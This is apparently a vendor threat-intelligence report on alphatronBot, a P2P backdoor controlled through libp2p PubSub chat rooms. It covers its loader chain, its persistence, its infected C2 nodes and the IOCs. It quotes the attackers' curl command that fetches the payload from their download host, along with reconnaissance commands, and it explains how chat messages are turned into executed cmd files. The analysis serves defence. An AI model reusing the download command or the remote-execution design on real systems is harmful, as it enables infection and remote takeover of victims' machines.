Overview
QiAnXin Threat Intelligence Center observed a backdoor program based on the P2P protocol during its recent daily operations, controlled through the form of PubSub chat rooms, the backdoor has more than 700 infected P2P C2 nodes built-in, affecting both linux and windows dual-platforms, and a large number of domestic government and enterprises have been hit, which we named alphatronBot, with a Remote control function, and will send a specific payload, after traceability found that alphatronBot first appeared in early 2023, in early April 2024 to reconstruct, has been observed that the infected P2P nodes are used as a network proxy for blasting activities.
We recommend our government and enterprise customers to deploy Skyrocket EDR in both office and server areas. The latest version of the virus database already supports the checking and killing of new and old versions of alphatronBot.
alphatronBot
2024 alphatronBot is generally used as a second-stage payload to be remotely distributed by an attacker via the curl command, and we hypothesize that alphatronBot may incorporate a MAAS distribution mechanism that utilizes a generic attack surface for propagation:
| - | - |
|---|---|
| Cmd Commands | |
| curl -k -o "***AppData\Local\Temp\NetFramework.4.8.7z" -L -C - "https://z.yaridata.com/v/NetFramework.4.8.7z" --user-agent "****" --retry 3 |
Wtime.cmd is added as persistent and is responsible for launching the loader wuf.exe
The logic of Wuf.exe is as follows, launching the alphatronBot backdoor program called Windows Driver Foundation (WDF).exe.
2024 refactored alphatronBot modified from the open source project manishmeganathan/peerchat, a chat room program implemented through libp2p
Attackers have made changes based on this:
The startup checks to see if it is in the C:\Users\Administrator\AppData\Local\Google\Chrome\User Data\ directory and if r01.txt exists in that directory.
Register yourself as a node for P2P and store the node configuration information in zk.txt and zi.txt in the same directory.
The attacker has over 700 P2P nodes built in. The format is as follows:
/ip4/infected\-p2p\-node/tcp/48888/p2p/Peer ID
The communication between nodes in this project is realized by PubSub, all nodes are connected to a common Topic(roomname), and the message distribution is realized by the sender of this Topic, the default Topic built in the project is as follows:
The attacker modified the Topic prefix to at001 and replaced the roomname.
Set username to Alpha after connecting to Topic.
Finally, the UI logic of the project was modified to realize remote control by changing the print function display.chatmessage after receiving a message to execute CMD commands.
The modified display.chatmessage writes incoming messages to zc01.cmd in the temp folder.
Finally execute zc01.cmd via cmd.
Traceability Analysis
Based on the terminal data, we found the 2023 version of alphatronBot (d038f50779fc1ae97db5b40289a38d64), written by the Qt library, with a similar functionality to that of the 2024 one, and it can be hypothesized from the VT upload data that the alphatronBot has a global reach.
The backdoor receives the following commands for probing and checking after connecting to the P2P distributed network.
| - | - |
|---|---|
| Cmd Commands | |
| tasklist | |
| WMIC DISKDRIVE GET SERIALNUMBER |
The attacker can determine the locally stored Peer ID in the sent cmd to send customized payloads to different targets.
Impact
Infected P2P networks
The 700+ P2P networks built into the backdoor consist of infected network device components from 80 countries and territories:
The nodes involve MikroTik routers, Hikvision cameras, VPS servers, DLink routers, CPE devices, etc. Since alphatronBot registers its own endpoints as P2P nodes, the size of the P2P network is much larger than what has been observed so far, and based on the Chianxin Global Botnet Detection System, we have observed that some of the P2P nodes The corresponding IPs started to be used as proxies for Fortinet SSVPN blasting activities.
Domestic scope of impact
We have tallied the domestic impacts, which appear from mid-2023 and continue to the present.
The industries to which the victim's unit belongs account for the following:
Due to the stealthy nature of the P2P protocol, an attacker can give commands through any node without having to go through a single C&C server. This means that even if some nodes are cleaned up by the security team, other nodes can still keep the Trojan running. Attackers can further enhance the survivability of the Trojan by injecting new modules or fixing vulnerabilities at any time with the distributed update feature. We recommend that government and enterprise customers update their virus databases in a timely manner, and full scanning, traffic level querying the P2P C2 nodes we provide to ensure the safety of the system.
Summarize
Currently, the full line of products based on the threat intelligence data from the QiAnXin Threat Intelligence Center, including the QiAnXin Threat Intelligence Platform (TIP), SkyRock, SkyEye Advanced Threat Detection System, QiAnXin NGSOC, and QiAnXin Situational Awareness, already support the accurate detection of such attacks.
IOC
P2P C2 network (see GitHub link):
https://github.com/RedDrip7/APT_Digital_Weapon/blob/master/alphatronBot/alphatronBot_ioc.md
ITW URL:
https://z.yaridata.com/v/NetFramework.4.8.7z
MD5:
e1e9a32926ebdbcedaf693dbc43b0e4d (2024 alphatronBot)
57cc9374d78d5e9841fddfd3cc7bd609 (2024 alphatronBot)